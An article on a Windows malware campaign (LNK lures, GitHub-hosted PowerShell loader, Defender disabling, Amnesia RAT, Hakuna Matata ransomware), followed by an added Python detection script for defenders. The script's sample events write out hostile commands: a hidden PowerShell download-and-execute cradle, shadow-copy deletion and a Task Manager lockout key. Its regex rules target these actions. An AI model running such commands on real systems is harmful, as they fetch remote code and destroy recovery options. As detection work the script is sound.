Malware experts have identified a sophisticated multi-stage malware attack on Windows operating systems that combines social engineering with cloud-based delivery.
The attack uses business-document themes to lure victims into opening compressed files containing malicious shortcuts that execute PowerShell scripts in the background.
The attack chain is designed to evade Microsoft Defender before delivering destructive payloads such as ransomware, surveillance malware, and banking Trojans.
The attack is a worrying trend in malware sophistication, as the attackers have opted to forgo exploit code entirely.
Instead, they rely on normal OS functionality, built-in admin tools, and cloud services such as GitHub and Dropbox so that their activity blends into normal enterprise traffic.
This significantly reduces the chances of signature-based detection while maximizing impact through a continuous, multi-level compromise.
The attack chain begins with a deceptive LNK shortcut file posing as an ordinary accounting document. When executed, it runs PowerShell with an execution-policy bypass to download an obfuscated first-stage loader script from GitHub.
Infection Vector
Threat actors have used a dedicated tool to systematically disable Microsoft Defender Antivirus: it registers a fake antivirus product and abuses the Windows operating system's trust assumptions so that Defender Antivirus shuts itself down automatically.
The malware campaign has four distinct operational phases. Once Defender has been neutralized, the campaign moves to reconnaissance and surveillance of the compromised environment, using screenshot-capture modules to exfiltrate visual evidence of user activity.
The threat actors then impose a comprehensive lockdown on the compromised system, disabling administrative tools, destroying recovery options, and hijacking file associations so that the user can no longer run legitimate applications or access their own files.
Finally, the campaign deploys Amnesia RAT to establish persistent remote access and steal data, including browser credentials, cryptocurrency wallets, and other sensitive financial information.
Concurrently, the Hakuna Matata ransomware encrypts the user's files, marking them with the NeverMind12F file extension. WinLocker components enforce the comprehensive lockdown of the compromised systems, including countdown timers that pressure the user into contacting the attacker to negotiate a ransom.
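The following detection logic is an added example for defenders, not code from the article or from the campaign itself. It scans process-creation events (a constructed sample in a Sysmon-like shape, not real telemetry) for the two stages described above that leave the clearest process-level traces: the shortcut-launched PowerShell download cradle with an execution-policy bypass fetching a script from a cloud host, and the lockdown phase (shadow-copy deletion, recovery disabled, Task Manager or Registry Editor policy keys, file-association hijacks). The GitHub URL, the file paths and the event field names are assumptions made for the sample; an execution-policy bypass on its own is deliberately not alerted, since administrators use it for legitimate scripts.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (hypothetical sample, not real telemetry).
SAMPLE_EVENTS = [
    {   # LNK double-click: explorer.exe spawns PowerShell with a cloud-hosted download cradle
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
                   "IEX (New-Object Net.WebClient).DownloadString("
                   "'https://raw.githubusercontent.com/example-org/repo/main/stage1.ps1')",
    },
    {   # Legitimate admin script: bypass flag but no download cradle -> must not alert
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
    },
    {   # Lockdown phase: destroying recovery options
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\vssadmin.exe",
        "cmdline": "vssadmin delete shadows /all /quiet",
    },
    {   # Lockdown phase: disabling an administrative tool via policy key
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\reg.exe",
        "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System"
                   r" /v DisableTaskMgr /t REG_DWORD /d 1 /f",
    },
    {   # Benign user activity
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Program Files\Notepad++\notepad++.exe",
        "cmdline": "notepad++.exe invoice.txt",
    },
]

# Stage-1 indicators: execution-policy bypass, a download/execute cradle, and a cloud file host.
EP_BYPASS = re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)
CLOUD_HOST = re.compile(r"https?://[^\s'\"]*(?:github(?:usercontent)?\.com|dropbox(?:usercontent)?\.com)", re.I)

# Lockdown-phase indicators, each tagged with a finding name.
LOCKDOWN_RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("recovery_disabled",
     re.compile(r"bcdedit(?:\.exe)?.*recoveryenabled\s+no", re.I)),
    ("admin_tool_policy",
     re.compile(r"reg(?:\.exe)?\s+add\b.*\b(?:DisableTaskMgr|DisableRegistryTools|DisableCMD)\b", re.I)),
    ("file_association_hijack",
     re.compile(r"\\(?:exefile|txtfile)\\shell\\open\\command", re.I)),
]


def classify(event):
    """Return the list of finding names that apply to one process-creation event."""
    findings = []
    cmd = event["cmdline"]
    image = event["image"].lower()
    parent = event["parent"].lower()

    if image.endswith(("powershell.exe", "pwsh.exe")):
        # Bypass alone is common admin practice; bypass plus a cradle is the loader pattern.
        if EP_BYPASS.search(cmd) and CRADLE.search(cmd):
            findings.append("powershell_download_cradle")
            if CLOUD_HOST.search(cmd):
                findings.append("cloud_hosted_payload")
            if parent.endswith("explorer.exe"):
                # explorer.exe as parent is consistent with a user opening a shortcut
                findings.append("user_launched_shortcut")

    for name, pattern in LOCKDOWN_RULES:
        if pattern.search(cmd):
            findings.append(name)
    return findings


def scan(events):
    """Run classify() over a list of events; return (index, findings) for every event that alerts."""
    alerts = []
    for idx, event in enumerate(events):
        findings = classify(event)
        if findings:
            alerts.append((idx, findings))
    return alerts


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(findings)}")
```

Correlating the findings by host within a short window matters more than any single match: a `powershell_download_cradle` with `user_launched_shortcut` followed by `shadow_copy_deletion` and `admin_tool_policy` on the same machine is the shape of the chain described in the article, whereas any one of them in isolation can have a benign explanation.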